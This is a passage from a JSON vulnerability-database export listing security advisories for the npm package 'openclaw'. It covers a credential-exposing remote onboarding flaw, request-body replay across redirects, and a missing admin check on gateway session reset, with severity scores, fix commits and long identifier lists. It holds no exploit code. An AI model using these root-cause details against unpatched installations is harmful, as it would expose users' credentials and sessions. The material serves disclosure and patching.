}, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35648", "GHSA-wj55-88gf-x564" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wfkm-7ayk-uuhb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91802?format=api", "vulnerability_id": "VCID-wkye-je9r-1fba", "summary": "OpenClaw: CLI Remote Onboarding Persists Unauthenticated Discovery Endpoint and Exfiltrates Gateway Credentials\n## Summary\n\nRemote onboarding accepted discovered gateway endpoints without an explicit trust confirmation before persisting the remote URL and connection details.\n\n## Impact\n\nA malicious or spoofed discovery endpoint could steer onboarding toward an attacker-controlled gateway and capture future gateway credentials or traffic.\n\n## Affected Component\n\n`src/commands/onboard-remote.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `d6affb17d8` (`CLI: confirm discovered remote gateways before saving config`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41342", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02906", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02957", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0295", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41342" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d6affb17d85f5f5ab08ef9f2b994b257af12e75a", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/d6affb17d85f5f5ab08ef9f2b994b257af12e75a" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3cw3-5vxw-g2h3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3cw3-5vxw-g2h3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41342", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41342" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-discovery-endpoint-credential-exfiltration-via-remote-onboarding", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-discovery-endpoint-credential-exfiltration-via-remote-onboarding" }, { "reference_url": "https://github.com/advisories/GHSA-3cw3-5vxw-g2h3", "reference_id": "GHSA-3cw3-5vxw-g2h3", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3cw3-5vxw-g2h3" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41342", "GHSA-3cw3-5vxw-g2h3" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wkye-je9r-1fba" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90198?format=api", "vulnerability_id": "VCID-wmr3-83u3-6qdb", "summary": "OpenClaw: `fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects\n## Impact\n\n`fetchWithSsrFGuard` replays unsafe request bodies across cross-origin redirects.\n\nA guarded fetch could resend unsafe request bodies or headers when following cross-origin redirects.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<2026.3.31`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @BG0ECV for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40037", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11509", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11475", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00037", "scoring_system": "epss", "scoring_elements": "0.11511", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40037" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qx8j-g322-qj6m" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40037" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T14:40:02Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unsafe-request-body-replay-via-fetchwithssrfguard-cross-origin-redirects" }, { "reference_url": "https://github.com/advisories/GHSA-qx8j-g322-qj6m", "reference_id": "GHSA-qx8j-g322-qj6m", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qx8j-g322-qj6m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-40037", "GHSA-qx8j-g322-qj6m" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wmr3-83u3-6qdb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91253?format=api", "vulnerability_id": "VCID-wut7-y72y-9ucb", "summary": "OpenClaw: Gateway agent /reset exposes admin session reset to operator.write callers\n## Summary\nBefore `v2026.3.23`, the Gateway `agent` RPC accepted `/reset` and `/new` for callers with only `operator.write`, even though the direct `sessions.reset` RPC correctly requires `operator.admin`.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable path lived in `src/gateway/server-methods/agent.ts`. A `/reset` or `/new` message with an explicit `sessionKey` reached `performGatewaySessionReset(...)` without enforcing the same `operator.admin` guard used by `sessions.reset`.\n\n## Fix Commit(s)\n- `50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0` — `fix(gateway): require admin for agent session reset`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest 